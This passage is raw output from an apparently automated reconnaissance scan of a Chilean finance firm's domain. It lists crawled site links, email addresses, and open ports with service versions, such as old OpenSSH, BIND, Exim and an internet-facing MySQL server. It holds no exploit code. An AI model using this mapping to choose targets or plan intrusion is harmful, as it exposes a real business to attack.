1450 - http://www.chilefa.cl/wp-content/uploads/2012/10/09-DSC05283-001-440x250.jpg
1451 - http://www.chilefa.cl/wp-content/uploads/2012/12/DSC_0448.jpg
1452 - http://www.chilefa.cl/wp-content/uploads/2012/12/IMG_7846.jpg
1453 - http://www.chilefa.cl/wp-content/uploads/2012/12/Torres-Trini-065-001.jpg
1454 - http://www.chilefa.cl/wp-content/uploads/2017/01/FullSizeRender-1-Rosario-Norte-440x250.jpg
1455 - http://www.chilefa.cl/wp-content/uploads/2017/06/Santiago-Bicentenario-440x250.jpg
1456 - http://www.chilefa.cl/wp-content/uploads/2017/07/Wind-Park-Canela-Los-Vilos-Chile-440x250.jpg
1457 - http://www.chilefa.cl/wp-content/uploads/2018/05/IMG_8786-440x250.jpg
1458 - http://www.chilefa.cl/wp-content/uploads/2019/01/IMG_0729-150x150.jpg
1459 - http://www.chilefa.cl/wp-content/uploads/2019/06/IMG_8795-150x150.jpg
1460 - http://www.chilefa.cl/wp-includes/wlwmanifest.xml
1461 - http://www.chilefa.cl/xmlrpc.php
1462 - http://www.chilefa.cl/xmlrpc.php?rsd
1463 - http://www.globalfin.cl/wp-content/themes/trymee/images/cache/153fc518657de203d28cc7bb58f0dcf9.png
1464 - http://www.globalfin.cl/wp-content/themes/trymee/images/cache/691be8af14f1e4fe4cdb286a172e6ec8.png
1465 - http://www.linkedin.com/company/chile-finance-advisors
1466 Total external links: 70
1467
1468+ Email addresses found:
1469 Total email address found: 0
1470
1471+ Directories found:
1472 Total directories: 0
1473
1474+ Directory indexing found:
1475 Total directories with indexing: 0
1476
1477----------------------------------------------------------------------
1478
1479
1480 + URL to crawl: https://www.chilefa.cl.
1481 + Date: 2020-03-02
1482
1483 + Crawling URL: https://www.chilefa.cl.:
1484 + Links:
1485 + Crawling https://www.chilefa.cl.
1486 + Searching for directories...
1487 + Searching open folders...
1488
1489
1490 + URL to crawl: http://www.chilefa.cl.:8080
1491 + Date: 2020-03-02
1492
1493 + Crawling URL: http://www.chilefa.cl.:8080:
1494 + Links:
1495 + Crawling http://www.chilefa.cl.:8080
1496 + Crawling http://www.chilefa.cl.:8080/
1497 + Searching for directories...
1498 + Searching open folders...
1499 + Crawl finished successfully.
1500----------------------------------------------------------------------
1501Summary of http://http://www.chilefa.cl.:8080
1502----------------------------------------------------------------------
1503+ Links crawled:
1504 - http://www.chilefa.cl.:8080
1505 - http://www.chilefa.cl.:8080/
1506 Total links crawled: 2
1507
1508+ Links to files found:
1509 Total links to files: 0
1510
1511+ Externals links found:
1512 - http://fonts.googleapis.com/css?family=Droid+Sans:rerular,italic,bold,bolditalic
1513 - http://fonts.googleapis.com/css?family=Droid+Serif:rerular,italic,bold,bolditalic
1514 - http://www.chilefa.cl/
1515 - http://www.chilefa.cl//
1516 - http://www.chilefa.cl/315-2/
1517 - http://www.chilefa.cl/315-2/our-team/
1518 - http://www.chilefa.cl/blog/
1519 - http://www.chilefa.cl/chilean-income-tax-return-process-year-2019/
1520 - http://www.chilefa.cl/chilean-income-tax-return-ty-2018/
1521 - http://www.chilefa.cl/comments/feed/
1522 - http://www.chilefa.cl/contact/
1523 - http://www.chilefa.cl/es/
1524 - http://www.chilefa.cl/es/servicios/
1525 - http://www.chilefa.cl/feed/
1526 - http://www.chilefa.cl/international-taxation-affidavits-tax-year-2019-commercial-year-2018/
1527 - http://www.chilefa.cl/our-customers/
1528 - http://www.chilefa.cl/portfolio/audit/
1529 - http://www.chilefa.cl/portfolio/doing-business-in-chile-year-2019/
1530 - http://www.chilefa.cl/portfolio/financial-planning/
1531 - http://www.chilefa.cl/portfolio/legal-services/
1532 - http://www.chilefa.cl/portfolio/mergers-and-acquisitions/
1533 - http://www.chilefa.cl/portfolio/outsourcing-2/
1534 - http://www.chilefa.cl/portfolio/tax-law-reform/
1535 - http://www.chilefa.cl/portfolio/tax-planning/
1536 - http://www.chilefa.cl/services/
1537 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.8.2
1538 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.8.2
1539 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.8.2
1540 - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=3.5.1
1541 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.5
1542 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.5
1543 - http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.5
1544 - http://www.chilefa.cl/wp-content/themes/trymee/css/fonts.php?ver=1.0.0
1545 - http://www.chilefa.cl/wp-content/themes/trymee/css/ie.css
1546 - http://www.chilefa.cl/wp-content/themes/trymee/css/ieCss3.php
1547 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.isotope.css?ver=1.5.14
1548 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.jPlayer.css?ver=2.1.0
1549 - http://www.chilefa.cl/wp-content/themes/trymee/css/jquery.prettyPhoto.min.css?ver=3.1.2
1550 - http://www.chilefa.cl/wp-content/themes/trymee/images/social_icons/linkedin.png
1551 - http://www.chilefa.cl/wp-content/themes/trymee/js/css3MediaQueries.min.js?ver=1.0.0
1552 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.cmsmsResponsiveSlider.min.js?ver=1.1.0
1553 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.easing.min.js?ver=1.3.0
1554 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jPlayer.min.js?ver=2.1.0
1555 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jPlayer.playlist.min.js?ver=1.0.0
1556 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.jTweetsAnywhere.min.php?ver=1.3.1
1557 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.min.js?ver=1.7.2
1558 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.prettyPhoto.min.js?ver=3.1.2
1559 - http://www.chilefa.cl/wp-content/themes/trymee/js/jquery.script.js?ver=1.0.0
1560 - http://www.chilefa.cl/wp-content/themes/trymee/js/modernizr.custom.all.min.js?ver=2.5.2
1561 - http://www.chilefa.cl/wp-content/themes/trymee/style.css
1562 - http://www.chilefa.cl/wp-content/uploads/2012/07/1-Torres-Trini-065-150x150.jpg
1563 - http://www.chilefa.cl/wp-content/uploads/2012/07/1-Torres-Trini-065-440x250.jpg
1564 - http://www.chilefa.cl/wp-content/uploads/2012/08/07-DSC05298.jpg
1565 - http://www.chilefa.cl/wp-content/uploads/2012/08/11-DSC05486-001-440x250.jpg
1566 - http://www.chilefa.cl/wp-content/uploads/2012/10/09-DSC05283-001-440x250.jpg
1567 - http://www.chilefa.cl/wp-content/uploads/2012/12/DSC_0448.jpg
1568 - http://www.chilefa.cl/wp-content/uploads/2012/12/IMG_7846.jpg
1569 - http://www.chilefa.cl/wp-content/uploads/2012/12/Torres-Trini-065-001.jpg
1570 - http://www.chilefa.cl/wp-content/uploads/2017/01/FullSizeRender-1-Rosario-Norte-440x250.jpg
1571 - http://www.chilefa.cl/wp-content/uploads/2017/06/Santiago-Bicentenario-440x250.jpg
1572 - http://www.chilefa.cl/wp-content/uploads/2017/07/Wind-Park-Canela-Los-Vilos-Chile-440x250.jpg
1573 - http://www.chilefa.cl/wp-content/uploads/2018/05/IMG_8786-440x250.jpg
1574 - http://www.chilefa.cl/wp-content/uploads/2019/01/IMG_0729-150x150.jpg
1575 - http://www.chilefa.cl/wp-content/uploads/2019/06/IMG_8795-150x150.jpg
1576 - http://www.chilefa.cl/wp-includes/wlwmanifest.xml
1577 - http://www.chilefa.cl/xmlrpc.php
1578 - http://www.chilefa.cl/xmlrpc.php?rsd
1579 - http://www.globalfin.cl/wp-content/themes/trymee/images/cache/153fc518657de203d28cc7bb58f0dcf9.png
1580 - http://www.globalfin.cl/wp-content/themes/trymee/images/cache/691be8af14f1e4fe4cdb286a172e6ec8.png
1581 - http://www.linkedin.com/company/chile-finance-advisors
1582 Total external links: 70
1583
1584+ Email addresses found:
1585 Total email address found: 0
1586
1587+ Directories found:
1588 Total directories: 0
1589
1590+ Directory indexing found:
1591 Total directories with indexing: 0
1592
1593----------------------------------------------------------------------
1594
1595
1596 + URL to crawl: https://www.chilefa.cl.:8443
1597 + Date: 2020-03-02
1598
1599 + Crawling URL: https://www.chilefa.cl.:8443:
1600 + Links:
1601 + Crawling https://www.chilefa.cl.:8443
1602 + Searching for directories...
1603 + Searching open folders...
1604
1605--Finished--
1606Summary information for domain chilefa.cl.
1607-----------------------------------------
1608 Domain Specific Information:
1609 Email: cfa@chilefa.cl�
1610 Email: cfa@chilefa.cl.
1611
1612 Domain Ips Information:
1613 IP: 162.210.50.254
1614 HostName: dns.site5.com Type: NS
1615 HostName: dns.site5.com Type: PTR
1616 Country: United States
1617 Is Active: True (proto-unreach ttl 52)
1618 Port: 22/tcp open ssh syn-ack ttl 52 OpenSSH 5.3 (protocol 2.0)
1619 Script Info: | ssh-hostkey:
1620 Script Info: | 1024 b7:20:18:7f:2c:3d:d8:25:65:9b:73:fd:39:d5:c5:37 (DSA)
1621 Script Info: |_ 2048 f6:87:b4:b3:91:58:a5:05:f5:82:68:65:69:90:fe:c6 (RSA)
1622 Port: 53/tcp open domain syn-ack ttl 52 (unknown banner: Pie is good in moderation :))
1623 Script Info: | dns-nsid:
1624 Script Info: |_ bind.version: Pie is good in moderation :)
1625 Script Info: | fingerprint-strings:
1626 Script Info: | DNSVersionBindReqTCP:
1627 Script Info: | version
1628 Script Info: | bind
1629 Script Info: |_ good in moderation :)
1630 IP: 64.233.189.27
1631 HostName: alt2.aspmx.l.google.com Type: MX
1632 HostName: tl-in-f27.1e100.net Type: PTR
1633 Country: United States
1634 Is Active: True (echo-reply ttl 41)
1635 Port: 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1636 Script Info: | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1637 Script Info: |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 d4si3191394pgj.25 - gsmtp
1638 Script Info: | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1639 Script Info: | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1640 Script Info: | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1641 Script Info: | Public Key type: rsa
1642 Script Info: | Public Key bits: 2048
1643 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1644 Script Info: | Not valid before: 2020-02-12T11:46:31
1645 Script Info: | Not valid after: 2020-05-06T11:46:31
1646 Script Info: | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1647 Script Info: |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1648 Script Info: |_ssl-date: 2020-03-02T11:52:25+00:00; -4s from scanner time.
1649 Os Info: Host: mx.google.com
1650 Script Info: |_clock-skew: -4s
1651 IP: 177.153.0.128
1652 Type: SPF
1653 Is Active: False
1654 IP: 199.10.31.235
1655 Type: SPF
1656 Is Active: True (reset ttl 48)
1657 IP: 108.174.149.181
1658 HostName: dns2.site5.com Type: NS
1659 HostName: dns2.site5.com Type: PTR
1660 Country: United States
1661 Is Active: True (echo-reply ttl 52)
1662 Port: 22/tcp open ssh syn-ack ttl 52 OpenSSH 5.3 (protocol 2.0)
1663 Script Info: | ssh-hostkey:
1664 Script Info: | 1024 d1:e5:31:c0:40:83:88:b3:7c:08:8e:00:e8:de:d4:4c (DSA)
1665 Script Info: |_ 2048 19:dc:3a:0e:a7:f0:61:d5:51:a3:46:79:f5:13:aa:78 (RSA)
1666 Port: 53/tcp open domain syn-ack ttl 52 (unknown banner: Pie is good in moderation :))
1667 Script Info: | dns-nsid:
1668 Script Info: |_ bind.version: Pie is good in moderation :)
1669 Script Info: | fingerprint-strings:
1670 Script Info: | DNSVersionBindReqTCP:
1671 Script Info: | version
1672 Script Info: | bind
1673 Script Info: |_ good in moderation :)
1674 IP: 103.18.109.138
1675 Type: SPF
1676 Is Active: True (reset ttl 52)
1677 IP: 172.255.62.10
1678 Type: SPF
1679 Is Active: True (reset ttl 54)
1680 IP: 172.255.62.11
1681 Type: SPF
1682 Is Active: True (echo-reply ttl 54)
1683 IP: 143.95.110.248
1684 HostName: www.chilefa.cl. Type: A
1685 Country: United States
1686 Is Active: True (syn-ack ttl 52)
1687 Port: 25/tcp open tcpwrapped syn-ack ttl 52
1688 Script Info: |_smtp-commands: Couldn't establish connection on port 25
1689 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1690 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1691 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1692 Script Info: | Public Key type: rsa
1693 Script Info: | Public Key bits: 2048
1694 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1695 Script Info: | Not valid before: 2019-08-28T00:00:00
1696 Script Info: | Not valid after: 2021-11-29T00:00:00
1697 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1698 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1699 Script Info: |_ssl-date: 2020-03-02T11:54:41+00:00; -4s from scanner time.
1700 Port: 26/tcp open smtp syn-ack ttl 52 Exim smtpd 4.91
1701 Script Info: |_smtp-commands: Couldn't establish connection on port 26
1702 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1703 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1704 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1705 Script Info: | Public Key type: rsa
1706 Script Info: | Public Key bits: 2048
1707 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1708 Script Info: | Not valid before: 2019-08-28T00:00:00
1709 Script Info: | Not valid after: 2021-11-29T00:00:00
1710 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1711 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1712 Port: 53/tcp open domain syn-ack ttl 52 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
1713 Script Info: | dns-nsid:
1714 Script Info: |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
1715 Port: 80/tcp open http syn-ack ttl 52 nginx 1.14.0
1716 Script Info: |_http-server-header: nginx/1.14.0
1717 Script Info: |_http-title: 403 Forbidden
1718 Port: 110/tcp open pop3 syn-ack ttl 52 Dovecot pop3d
1719 Script Info: |_pop3-capabilities: RESP-CODES USER CAPA SASL(PLAIN LOGIN) STLS AUTH-RESP-CODE UIDL TOP PIPELINING
1720 Script Info: |_ssl-date: 2020-03-02T11:54:45+00:00; -4s from scanner time.
1721 Port: 143/tcp open imap syn-ack ttl 52 Dovecot imapd
1722 Script Info: |_imap-capabilities: STARTTLS LOGIN-REFERRALS OK Pre-login SASL-IR post-login have listed ID ENABLE IMAP4rev1 AUTH=PLAIN more capabilities AUTH=LOGINA0001 IDLE LITERAL+ NAMESPACE
1723 Script Info: |_ssl-date: 2020-03-02T11:54:44+00:00; -4s from scanner time.
1724 Port: 443/tcp open ssl/http syn-ack ttl 52 nginx 1.14.0
1725 Script Info: |_http-server-header: nginx/1.14.0
1726 Script Info: |_http-title: 403 Forbidden
1727 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1728 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1729 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1730 Script Info: | Public Key type: rsa
1731 Script Info: | Public Key bits: 2048
1732 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1733 Script Info: | Not valid before: 2019-08-28T00:00:00
1734 Script Info: | Not valid after: 2021-11-29T00:00:00
1735 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1736 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1737 Script Info: |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1738 Script Info: | tls-nextprotoneg:
1739 Script Info: | h2
1740 Script Info: |_ http/1.1
1741 Port: 465/tcp open ssl/smtps? syn-ack ttl 52
1742 Script Info: |_smtp-commands: Couldn't establish connection on port 465
1743 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1744 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1745 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1746 Script Info: | Public Key type: rsa
1747 Script Info: | Public Key bits: 2048
1748 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1749 Script Info: | Not valid before: 2019-08-28T00:00:00
1750 Script Info: | Not valid after: 2021-11-29T00:00:00
1751 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1752 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1753 Script Info: |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1754 Port: 587/tcp open tcpwrapped syn-ack ttl 52
1755 Script Info: |_smtp-commands: Couldn't establish connection on port 587
1756 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1757 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1758 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1759 Script Info: | Public Key type: rsa
1760 Script Info: | Public Key bits: 2048
1761 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1762 Script Info: | Not valid before: 2019-08-28T00:00:00
1763 Script Info: | Not valid after: 2021-11-29T00:00:00
1764 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1765 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1766 Port: 993/tcp open ssl/imaps? syn-ack ttl 52
1767 Script Info: |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1768 Port: 995/tcp open ssl/pop3s? syn-ack ttl 52
1769 Script Info: |_ssl-date: 2020-03-02T11:54:35+00:00; -3s from scanner time.
1770 Port: 3306/tcp open mysql syn-ack ttl 52 MySQL 5.6.41-84.1
1771 Script Info: | mysql-info:
1772 Script Info: | Protocol: 10
1773 Script Info: | Version: 5.6.41-84.1
1774 Script Info: | Thread ID: 55592206
1775 Script Info: | Capabilities flags: 63487
1776 Script Info: | Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsLoadDataLocal, IgnoreSigpipes, LongColumnFlag, ODBCClient, ConnectWithDatabase, LongPassword, SupportsCompression, Speaks41ProtocolNew, FoundRows, DontAllowDatabaseTableColumn, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
1777 Script Info: | Status: Autocommit
1778 Script Info: | Salt: U?{n5]UqXE3lG_)L"cOB
1779 Script Info: |_ Auth Plugin Name: mysql_native_password
1780 Port: 8080/tcp open http syn-ack ttl 52 nginx 1.14.0
1781 Script Info: |_http-server-header: nginx/1.14.0
1782 Script Info: |_http-title: 403 Forbidden
1783 Port: 8443/tcp open ssl/http syn-ack ttl 52 nginx 1.14.0
1784 Script Info: |_http-server-header: nginx/1.14.0
1785 Script Info: |_http-title: 403 Forbidden
1786 Script Info: | ssl-cert: Subject: commonName=*.accountservergroup.com
1787 Script Info: | Subject Alternative Name: DNS:*.accountservergroup.com, DNS:accountservergroup.com
1788 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1789 Script Info: | Public Key type: rsa
1790 Script Info: | Public Key bits: 2048
1791 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1792 Script Info: | Not valid before: 2019-08-28T00:00:00
1793 Script Info: | Not valid after: 2021-11-29T00:00:00
1794 Script Info: | MD5: 084d 0712 07d6 4e9d 862e 9367 3b2b e8e6
1795 Script Info: |_SHA-1: ac5a 4957 d035 ddf2 abce 3d49 2d3e 7db8 348c 28ef
1796 Script Info: |_ssl-date: 2020-03-02T11:54:35+00:00; -4s from scanner time.
1797 Script Info: | tls-nextprotoneg:
1798 Script Info: | h2
1799 Script Info: |_ http/1.1
1800 Os Info: Host: uscentral421.accountservergroup.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
1801 Script Info: |_clock-skew: mean: -3s, deviation: 0s, median: -4s
1802 IP: 191.252.57.0
1803 Type: SPF
1804 Is Active: False
1805 IP: 54.245.125.39
1806 Type: SPF
1807 Is Active: False
1808 IP: 174.121.227.2
1809 Type: SPF
1810 Is Active: False
1811 IP: 23.83.208.1
1812 Type: SPF
1813 Is Active: False
1814 IP: 173.194.79.26
1815 HostName: aspmx.l.google.com Type: MX
1816 HostName: eg-in-f26.1e100.net Type: PTR
1817 Country: United States
1818 Is Active: True (echo-reply ttl 46)
1819 Port: 25/tcp open smtp syn-ack ttl 109 Google gsmtp
1820 Script Info: | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1821 Script Info: |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 p10si6275769eja.532 - gsmtp
1822 Script Info: | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1823 Script Info: | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1824 Script Info: | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1825 Script Info: | Public Key type: rsa
1826 Script Info: | Public Key bits: 2048
1827 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1828 Script Info: | Not valid before: 2020-02-12T11:46:31
1829 Script Info: | Not valid after: 2020-05-06T11:46:31
1830 Script Info: | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1831 Script Info: |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1832 Script Info: |_ssl-date: 2020-03-02T11:57:33+00:00; -4s from scanner time.
1833 Os Info: Host: mx.google.com
1834 Script Info: |_clock-skew: -4s
1835 IP: 74.125.28.26
1836 HostName: alt3.aspmx.l.google.com Type: MX
1837 HostName: pc-in-f26.1e100.net Type: PTR
1838 Country: United States
1839 Is Active: True (syn-ack ttl 104)
1840 Port: 25/tcp open smtp syn-ack ttl 103 Google gsmtp
1841 Script Info: | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1842 Script Info: |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 e3si10053848pjt.12 - gsmtp
1843 Script Info: | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1844 Script Info: | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1845 Script Info: | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1846 Script Info: | Public Key type: rsa
1847 Script Info: | Public Key bits: 2048
1848 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1849 Script Info: | Not valid before: 2020-02-12T11:46:31
1850 Script Info: | Not valid after: 2020-05-06T11:46:31
1851 Script Info: | MD5: 70ac 8c9c 5c66 2296 8b68 fae7 cd66 6b8c
1852 Script Info: |_SHA-1: 8479 a7ec 6b48 244a ccab 3110 8d59 1c65 7a70 6f28
1853 Script Info: |_ssl-date: 2020-03-02T11:58:02+00:00; -4s from scanner time.
1854 Os Info: Host: mx.google.com
1855 Script Info: |_clock-skew: -4s
1856 IP: 199.10.31.236
1857 Type: SPF
1858 Is Active: True (reset ttl 48)
1859 IP: 54.214.232.113
1860 Type: SPF
1861 Is Active: False
1862 IP: 46.232.183.0
1863 Type: SPF
1864 Is Active: False
1865 IP: 108.177.8.26
1866 HostName: alt4.aspmx.l.google.com Type: MX
1867 HostName: ow-in-f26.1e100.net Type: PTR
1868 Country: United States
1869 Is Active: True (echo-reply ttl 42)
1870 Port: 25/tcp open smtp syn-ack ttl 105 Google gsmtp
1871 Script Info: | smtp-commands: mx.google.com at your service, [185.32.222.120], SIZE 157286400, 8BITMIME, STARTTLS, ENHANCEDSTATUSCODES, PIPELINING, CHUNKING, SMTPUTF8,
1872 Script Info: |_ 2.0.0 https://www.google.com/search?btnI&q=RFC+5321 d196si6174681oig.268 - gsmtp
1873 Script Info: | ssl-cert: Subject: commonName=mx.google.com/organizationName=Google LLC/stateOrProvinceName=California/countryName=US
1874 Script Info: | Subject Alternative Name: DNS:mx.google.com, DNS:alt1.aspmx.l.google.com, DNS:alt1.gmail-smtp-in.l.google.com, DNS:alt1.gmr-smtp-in.l.google.com, DNS:alt2.aspmx.l.google.com, DNS:alt2.gmail-smtp-in.l.google.com, DNS:alt2.gmr-smtp-in.l.google.com, DNS:alt3.aspmx.l.google.com, DNS:alt3.gmail-smtp-in.l.google.com, DNS:alt3.gmr-smtp-in.l.google.com, DNS:alt4.aspmx.l.google.com, DNS:alt4.gmail-smtp-in.l.google.com, DNS:alt4.gmr-smtp-in.l.google.com, DNS:aspmx.l.google.com, DNS:aspmx2.googlemail.com, DNS:aspmx3.googlemail.com, DNS:aspmx4.googlemail.com, DNS:aspmx5.googlemail.com, DNS:gmail-smtp-in.l.google.com, DNS:gmr-mx.google.com, DNS:gmr-smtp-in.l.google.com, DNS:mx1.smtp.goog, DNS:mx2.smtp.goog, DNS:mx3.smtp.goog, DNS:mx4.smtp.goog
1875 Script Info: | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US
1876 Script Info: | Public Key type: rsa
1877 Script Info: | Public Key bits: 2048
1878 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1879 Script Info: | Not valid before: 2020-02-12T11:46:31
1880 Script Info: | Not valid after: 2020-05-06T11:46:31
